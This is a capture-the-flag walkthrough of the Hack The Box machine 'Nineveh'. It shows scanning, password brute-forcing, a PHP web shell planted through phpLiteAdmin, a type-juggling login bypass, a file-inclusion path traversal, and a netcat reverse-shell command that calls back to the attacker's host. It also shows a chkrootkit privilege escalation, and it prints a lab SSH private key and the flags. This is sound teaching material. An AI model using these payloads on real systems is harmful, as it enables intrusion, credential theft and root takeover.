Nineveh

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.43 -oN allPorts

• -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

• --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

• -p- scanning the entire port range, from 1 to 65535.

• -T5 insane mode, it is the fastest mode of the nmap time template.

• -Pn assume the host is online.

• -n scan without reverse DNS resolution.

• -oN save the scan result into a file, in this case the allports file.

# Nmap 7.92 scan initiated Sun Sep  4 12:51:17 2022 as: nmap -sS -p- --min-rate 5000 -Pn -n -oN allPorts 10.10.10.43
Nmap scan report for 10.10.10.43
Host is up (0.053s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https

# Nmap done at Sun Sep  4 12:51:43 2022 -- 1 IP address (1 host up) scanned in 26.70 seconds

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p80,443 10.10.10.43 -oN targeted

• -sC performs the scan using the default set of scripts.

• -sV enables version detection.

• -oN save the scan result into file, in this case the targeted file.

# Nmap 7.92 scan initiated Sun Sep  4 12:51:59 2022 as: nmap -sCV -p80,443 -oN targeted 10.10.10.43
Nmap scan report for 10.10.10.43
Host is up (0.059s latency).

PORT    STATE SERVICE  VERSION
80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn`t have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after:  2018-07-01T15:03:30
|_http-title: Site doesn't have a title (text/html).
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
|_http-server-header: Apache/2.4.18 (Ubuntu)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Sep  4 12:52:19 2022 -- 1 IP address (1 host up) scanned in 19.62 seconds

As we can see in the nmap report, there is a domain name. Let's add it to the /etc/hosts file.

nano /etc/hosts

# Host addresses
127.0.0.1  localhost
127.0.1.1  alfa8sa
::1        localhost ip6-localhost ip6-loopback
ff02::1    ip6-allnodes
f02::2     ip6-allrouters
10.10.10.43    nineveh.htb

If we check the website on port 80, we won't see much going on.

On the other hand, the website on port 443 only has one image.

If we enumerate subdirectories on the HTTP website, we'll find the /info.php and department entries.

gobuster dir -u http://10.10.10.43 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200 -x txt,php

• dir enumerates directories or files.

• -u the target URL.

• -w path to the wordlist.

• -t number of current threads, in this case 200 threads.

• -x file extensions to search for.

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.43
[+] Method:                  GET
[+] Threads:                 200
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              txt,php
[+] Timeout:                 10s
===============================================================
2022/09/04 17:04:21 Starting gobuster in directory enumeration mode
===============================================================
/info.php             (Status: 200) [Size: 83689]
/department           (Status: 301) [Size: 315] [--> http://10.10.10.43/department/]
                                                                                    
===============================================================                                                      
2022/09/04 17:12:34 Finished                                                                                         
===============================================================

And if we do the same in the HTTPS website, we'll find the /db directory.

gobuster dir -u https://10.10.10.43 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 -x txt,php -k

• dir enumerates directories or files.

• -u the target URL.

• -w path to the wordlist.

• -t number of current threads, in this case 200 threads.

• -x file extensions to search for.

• -k skip TLS certificate verification.

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://10.10.10.43
[+] Method:                  GET
[+] Threads:                 200
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              txt,php
[+] Timeout:                 10s
===============================================================
2022/09/04 17:15:14 Starting gobuster in directory enumeration mode
===============================================================
/db                   (Status: 301) [Size: 309] [--> https://10.10.10.43/db/]
                                                                             
===============================================================
2022/09/04 17:15:33 Finished
===============================================================

The /department directory is just a login page which asks for a username and a password.

And the /db directory of the HTTPS website is a phpLiteAdmin v1.9 login panel which asks for a password.

Exploitation

As the login page in the /db directory only asks for a password, we could try to brute-force it with hydra.

hydra -l admin -P /usr/share/SecLists/Passwords/twitter-banned.txt 10.10.10.43 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password."

• -l username.

• -P password wordlist.

• https-post-form make an HTTPS POST request.

• -t number of current threads, in this case 200 threads.

• -x file extensions to search for.

• -k skip TLS certificate verification.

Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-04 17:22:40
[DATA] max 16 tasks per 1 server, overall 16 tasks, 399 login tries (l:1/p:399), ~25 tries per task
[DATA] attacking http-post-forms://10.10.10.43:443/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password.
[443][http-post-form] host: 10.10.10.43   login: admin   password: password123
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-09-04 17:23:01

Now we know the password is password123, let's log in.

At this point, I look for ways of getting a Remote Code Execution on the machine, and I found this GitHub repository which explains how to do it. First, let's create a new database with the .php extension.

Then, select the new database. As we can see, the file is located in /var/tmp/rce.php.

And create a new table with one field.

The type of the column should set to TEXT, and the default value should be set to <?php system($_GET['cmd'])?>.

Now the table is created, but we have to find a way of accessing it, so we can execute commands.

If we try to log in as the test user in the /department page, we'll get an error saying invalid username.

As we saw in the SSL certificate, it is signed as the admin@nineveh.htb user. We could try to log in as the admin user in the /department login page.

We get the message Invalid Password! which means that admin is a valid user. At this point, I intercepted the login request with BurpSuite, and tried to do a Type Juggling attack.

Type Juggling vulnerabilities are a class of vulnerability wherein an object is initialized or accessed as the incorrect type, allowing an attacker to potentially bypass authentication or undermine the type safety of an application, possibly leading to arbitrary code execution.

If we modify the login request and change the current payload.

username=admin&password=test

To the following one.

username=admin&password[]=

We should bypass the login panel.

If we go to the Notes section, we'll see a note from the amrois user. Note the URL.

http://nineveh.htb/department/manage.php?notes=files/ninevehNotes.txt

I tried to do a Local File Inclusion attack in the notes GET parameter, trying to import the /etc/passwd file. And the following parameter seems to work.

http://nineveh.htb/department/manage.php?notes=/ninevehNotes/../../etc/passwd

Now, we can access the database PHP file we created earlier, which is located in /var/tmp/rce.php. And we can execute commands with the cmd parameter as the www-data user.

http://nineveh.htb/department/manage.php?notes=/ninevehNotes/../../var/tmp/rce.php&cmd=whoami

Time to get a shell. First, let's set a netcat listener on port 4444.

nc -lvnp 4444

• -l listen mode.

• -v verbose mode.

• -n numeric-only IP, no DNS resolution.

• -p specify the port to listen on.

Now, execute access the following URL, which will send us a reverse shell.

http://nineveh.htb/department/manage.php?notes=/ninevehNotes/../../var/tmp/rce.php&cmd=rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f|/bin/sh%20-i%202%3E%261|nc%2010.10.14.9%204444%20%3E/tmp/f

listening on [any] 4444 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.43] 50608
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data

Privilege Escalation

First, let's set an interactive TTY shell.

script /dev/null -c /bin/bash

Then I press Ctrl+Z and execute the following command on my local machine:

stty raw -echo; fg

reset

Terminal type? xterm

Next, I export a few variables:

export TERM=xterm

export SHELL=bash

Finally, I run the following command in our local machine:

stty size

51 236

And set the proper dimensions in the victim machine:

stty rows 51 columns 236

If check in the /var/www/ssl/secure_notes/ directory, we'll see an image which weights a lot.

ls -l /var/www/ssl/secure_notes/

total 2832
-rw-r--r-- 1 root root      71 Jul  2  2017 index.html
-rw-r--r-- 1 root root 2891984 Jul  2  2017 nineveh.png

If we list the strings of the file, we'll see an SSH private key of the amrois user.

strings /var/www/ssl/secure_notes/nineveh.png

...
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAri9EUD7bwqbmEsEpIeTr2KGP/wk8YAR0Z4mmvHNJ3UfsAhpI
H9/Bz1abFbrt16vH6/jd8m0urg/Em7d/FJncpPiIH81JbJ0pyTBvIAGNK7PhaQXU
PdT9y0xEEH0apbJkuknP4FH5Zrq0nhoDTa2WxXDcSS1ndt/M8r+eTHx1bVznlBG5
FQq1/wmB65c8bds5tETlacr/15Ofv1A2j+vIdggxNgm8A34xZiP/WV7+7mhgvcnI
3oqwvxCI+VGhQZhoV9Pdj4+D4l023Ub9KyGm40tinCXePsMdY4KOLTR/z+oj4sQT
X+/1/xcl61LADcYk0Sw42bOb+yBEyc1TTq1NEQIDAQABAoIBAFvDbvvPgbr0bjTn
KiI/FbjUtKWpWfNDpYd+TybsnbdD0qPw8JpKKTJv79fs2KxMRVCdlV/IAVWV3QAk
FYDm5gTLIfuPDOV5jq/9Ii38Y0DozRGlDoFcmi/mB92f6s/sQYCarjcBOKDUL58z
GRZtIwb1RDgRAXbwxGoGZQDqeHqaHciGFOugKQJmupo5hXOkfMg/G+Ic0Ij45uoR
JZecF3lx0kx0Ay85DcBkoYRiyn+nNgr/APJBXe9Ibkq4j0lj29V5dT/HSoF17VWo
9odiTBWwwzPVv0i/JEGc6sXUD0mXevoQIA9SkZ2OJXO8JoaQcRz628dOdukG6Utu
Bato3bkCgYEA5w2Hfp2Ayol24bDejSDj1Rjk6REn5D8TuELQ0cffPujZ4szXW5Kb
ujOUscFgZf2P+70UnaceCCAPNYmsaSVSCM0KCJQt5klY2DLWNUaCU3OEpREIWkyl
1tXMOZ/T5fV8RQAZrj1BMxl+/UiV0IIbgF07sPqSA/uNXwx2cLCkhucCgYEAwP3b
vCMuW7qAc9K1Amz3+6dfa9bngtMjpr+wb+IP5UKMuh1mwcHWKjFIF8zI8CY0Iakx
DdhOa4x+0MQEtKXtgaADuHh+NGCltTLLckfEAMNGQHfBgWgBRS8EjXJ4e55hFV89
P+6+1FXXA1r/Dt/zIYN3Vtgo28mNNyK7rCr/pUcCgYEAgHMDCp7hRLfbQWkksGzC
fGuUhwWkmb1/ZwauNJHbSIwG5ZFfgGcm8ANQ/Ok2gDzQ2PCrD2Iizf2UtvzMvr+i
tYXXuCE4yzenjrnkYEXMmjw0V9f6PskxwRemq7pxAPzSk0GVBUrEfnYEJSc/MmXC
iEBMuPz0RAaK93ZkOg3Zya0CgYBYbPhdP5FiHhX0+7pMHjmRaKLj+lehLbTMFlB1
MxMtbEymigonBPVn56Ssovv+bMK+GZOMUGu+A2WnqeiuDMjB99s8jpjkztOeLmPh
PNilsNNjfnt/G3RZiq1/Uc+6dFrvO/AIdw+goqQduXfcDOiNlnr7o5c0/Shi9tse
i6UOyQKBgCgvck5Z1iLrY1qO5iZ3uVr4pqXHyG8ThrsTffkSVrBKHTmsXgtRhHoc
il6RYzQV/2ULgUBfAwdZDNtGxbu5oIUB938TCaLsHFDK6mSTbvB/DywYYScAWwF7
fw4LVXdQMjNJC3sn3JaqY1zJkE4jXlZeNQvCx4ZadtdJD9iO+EUG
-----END RSA PRIVATE KEY-----
...
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuL0RQPtvCpuYSwSkh5OvYoY//CTxgBHRniaa8c0ndR+wCGkgf38HPVpsVuu3Xq8fr+N3ybS6uD8Sbt38Umdyk+IgfzUlsnSnJMG8gAY0rs+FpBdQ91P3LTEQQfRqlsmS6Sc/gUflmurSeGgNNrZbFcNxJLWd238zyv55MfHVtXOeUEbkVCrX/CYHrlzxt2zm0ROVpyv/Xk5+/UDaP68h2CDE2CbwDfjFmI/9ZXv7uaGC9ycjeirC/EIj5UaFBmGhX092Pj4PiXTbdRv0rIabjS2KcJd4+wx1jgo4tNH/P6iPixBNf7/X/FyXrUsANxiTRLDjZs5v7IETJzVNOrU0R amrois@nineveh.htb
...

And as we can see, port 22 is open.

netstat -tulpn

• -t TCP connections.

• -u UDP connections.

• -l listening.

• -p show the PID/Program name.

• -n don't resolve names.

(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:443             0.0.0.0:*               LISTEN      -               
tcp6       0      0 :::22                   :::*                    LISTEN      -

Let's copy the key into the /tmp/id_rsa file, and give it the right permissions.

nano /tmp/id_rsa

chmod 600 /tmp/id_rsa

Now we can log in as the amrois user via SSH, and we'll be able to grab the user flag.

ssh -i /tmp/id_rsa amrois@127.0.0.1

Could not create directory '/var/www/.ssh'.
The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:aWXPsULnr55BcRUl/zX0n4gfJy5fg29KkuvnADFyMvk.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts).
Ubuntu 16.04.2 LTS
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

288 packages can be updated.
207 updates are security updates.


You have mail.
Last login: Mon Jul  3 00:19:59 2017 from 192.168.0.14
amrois@nineveh:~$ whoami
amrois
amrois@nineveh:~$ cat user.txt 
5816329477ff124a3935faa4563d2035

At this point, I tried to look for scheduled tasks on the system with the pspy tool. Let's transfer pspy to the nineveh machine.

pspy is a command line tool designed to snoop on processes without need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute.

https://github.com/DominicBreuker/pspy

python -m http.server

Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

On the time machine, go to the /tmp directory, download the binary, and give it execution permissions.

cd /tmp

wget http://10.10.14.2:8000/pspy64

chmod +x pspy64

If we execute the tool, we'll see at some point that the root user, with the UID set to 0, is executing the /usr/bin/chkrootkit binary.

./pspy64

pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2022/09/04 11:35:01 CMD: UID=0    PID=21345  | /bin/sh /usr/bin/chkrootkit

We can see in exploit-db that there is a way of escalating privileges abusing this binary. First, let's create a file in the /tmp directory called update, which will give the /bin/bash binary the SUID permission.

nano /tmp/update

chmod +x /tmp/update

#!/bin/bash
chmod u+s /bin/bash

Now, let's wait until the /bin/bash binary has the SUID permission set, and then all we have to do is execute bash with root permissions, and reap the harvest and take the root flag.

bash -p

bash-4.3# whoami
root
bash-4.3# cat /root/root.txt 
7dacd633821519ab7fcdd7d2fe2120df